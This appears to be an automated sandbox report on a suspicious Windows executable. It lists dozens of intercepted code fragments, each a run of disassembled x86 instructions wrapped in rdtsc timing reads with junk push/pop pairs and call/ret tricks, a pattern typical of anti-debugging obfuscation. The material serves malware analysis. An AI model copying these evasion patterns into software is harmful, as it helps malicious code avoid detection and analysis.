Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB0CEE second address: DB0D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB0D01 second address: DB0D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF1148823D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB0D18 second address: DB0D22 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF114F02976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB0D22 second address: DB0D28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB129A second address: DB12A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3B6F second address: DB3B73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3B73 second address: DB3B79 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3B79 second address: DB3BEB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 0A64EBC3h 0x0000000f and cx, 4B78h 0x00000014 push 00000003h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FF1148823C8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 sbb cx, 6D15h 0x00000035 push 00000000h 0x00000037 push 00000003h 0x00000039 call 00007FF1148823C9h 0x0000003e jns 00007FF1148823CCh 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push edx 0x00000048 pop edx 0x00000049 popad 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007FF1148823D8h 0x00000052 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3BEB second address: DB3BF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF114F0297Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3BF5 second address: DB3C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007FF1148823D1h 0x0000000f mov eax, dword ptr [eax] 0x00000011 ja 00007FF1148823D4h 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3C1C second address: DB3C34 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF114F02976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jno 00007FF114F02976h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3C34 second address: DB3C3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3C3A second address: DB3C82 instructions: 0x00000000 rdtsc 0x00000002 je 00007FF114F0297Ch 0x00000008 jl 00007FF114F02976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 xor edx, 5E8139DCh 0x00000017 lea ebx, dword ptr [ebp+12457923h] 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FF114F02978h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b pushad 0x0000003c popad 0x0000003d pop eax 0x0000003e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3D0B second address: DB3D10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DB3D10 second address: DB3D28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF114F0297Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DC5B8A second address: DC5B8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD4B86 second address: DD4B99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jbe 00007FF114F0297Ch 0x0000000d js 00007FF114F02976h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD4B99 second address: DD4BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FF1148823C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD4BA5 second address: DD4BA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD4BA9 second address: DD4BAF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2A98 second address: DD2A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2A9C second address: DD2AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FF1148823C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FF1148823C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2AB0 second address: DD2AC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 ja 00007FF114F02976h 0x0000000f jno 00007FF114F02976h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2C63 second address: DD2C67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2C67 second address: DD2C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FF114F0297Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF114F02980h 0x00000012 jmp 00007FF114F02985h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2C9E second address: DD2CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2CAA second address: DD2CB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD2F88 second address: DD2F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD3381 second address: DD3391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FF114F02980h 0x0000000b push ebx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD3503 second address: DD3509 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD3509 second address: DD350D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD350D second address: DD3511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD3511 second address: DD351F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FF114F0298Ah 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD43E8 second address: DD43EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD45C4 second address: DD45EA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FF114F02981h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jc 00007FF114F02976h 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD45EA second address: DD45FC instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF1148823CCh 0x00000008 jc 00007FF1148823C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD45FC second address: DD4606 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF114F02976h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DD4A20 second address: DD4A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FF1148823C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA3EF7 second address: DA3EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA3EFC second address: DA3F04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA3F04 second address: DA3F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DA3F08 second address: DA3F2E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF1148823C6h 0x00000008 jmp 00007FF1148823D7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DDBE9A second address: DDBEC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF114F0297Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF114F02986h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DDC50B second address: DDC54C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e jmp 00007FF1148823D0h 0x00000013 pop eax 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jmp 00007FF1148823CFh 0x0000001e jnp 00007FF1148823C6h 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DDC54C second address: DDC57D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF114F0297Ch 0x00000008 js 00007FF114F02976h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007FF114F02983h 0x0000001c jno 00007FF114F02976h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE1DF0 second address: DE1DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF1148823C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE22BF second address: DE22C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE22C3 second address: DE22C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE2CA1 second address: DE2CA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE2CA5 second address: DE2CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 add dword ptr [esp], 6C48C3EAh 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007FF1148823C8h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 jg 00007FF1148823CCh 0x0000002e jmp 00007FF1148823D0h 0x00000033 push E32CAE5Bh 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE2CFC second address: DE2D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE2D00 second address: DE2D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007FF1148823C6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE2D16 second address: DE2D1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE3045 second address: DE304B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE3454 second address: DE346F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE346F second address: DE3486 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF1148823D3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE3486 second address: DE348A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE39A8 second address: DE39AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE39AC second address: DE39C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02987h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE3C8E second address: DE3C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE3D95 second address: DE3DA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F0297Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE5BD6 second address: DE5BDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE5BDA second address: DE5C02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FF114F02978h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007FF114F0297Eh 0x00000018 jnl 00007FF114F02976h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE5C02 second address: DE5C07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE659B second address: DE65A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE6E53 second address: DE6E62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jns 00007FF1148823CCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE7D72 second address: DE7D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE7FA1 second address: DE7FEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FF1148823CDh 0x0000000d jmp 00007FF1148823CAh 0x00000012 popad 0x00000013 nop 0x00000014 mov dword ptr [ebp+12471859h], edx 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D2346h], eax 0x00000022 push 00000000h 0x00000024 mov dword ptr [ebp+122DB874h], ecx 0x0000002a xchg eax, ebx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 jmp 00007FF1148823CFh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE7D78 second address: DE7D7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE7FEE second address: DE7FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE7FF3 second address: DE8016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF114F02986h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE8016 second address: DE801A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE801A second address: DE8024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE87FD second address: DE8801 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE9611 second address: DE9623 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF114F02978h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DE9623 second address: DE9627 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEA166 second address: DEA1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF114F02985h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jnc 00007FF114F0297Ch 0x00000012 mov dword ptr [ebp+122D1FD1h], edi 0x00000018 sub si, 534Ah 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007FF114F02978h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 0000001Dh 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 mov dword ptr [ebp+122D2D50h], edx 0x0000003f push 00000000h 0x00000041 jmp 00007FF114F02988h 0x00000046 xchg eax, ebx 0x00000047 jng 00007FF114F02980h 0x0000004d push eax 0x0000004e push edx 0x0000004f push edi 0x00000050 pop edi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEF0FF second address: DEF103 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEF103 second address: DEF176 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF114F02976h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jmp 00007FF114F02985h 0x00000011 nop 0x00000012 mov dword ptr [ebp+122D2346h], eax 0x00000018 push 00000000h 0x0000001a call 00007FF114F0297Ah 0x0000001f jg 00007FF114F0297Ch 0x00000025 pop ebx 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push eax 0x0000002b call 00007FF114F02978h 0x00000030 pop eax 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 add dword ptr [esp+04h], 00000017h 0x0000003d inc eax 0x0000003e push eax 0x0000003f ret 0x00000040 pop eax 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D180Fh] 0x00000048 mov edi, dword ptr [ebp+122D377Ch] 0x0000004e xchg eax, esi 0x0000004f pushad 0x00000050 push ecx 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEA9C7 second address: DEA9E8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF1148823CCh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FF1148823CCh 0x00000014 jnl 00007FF1148823C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF2258 second address: DF225C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF307D second address: DF3081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF3081 second address: DF3085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DEF2D0 second address: DEF2DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF1148823CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\u57m8aCdwb.exe	RDTSC instruction interceptor: First address: DF1417 second address: DF141D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
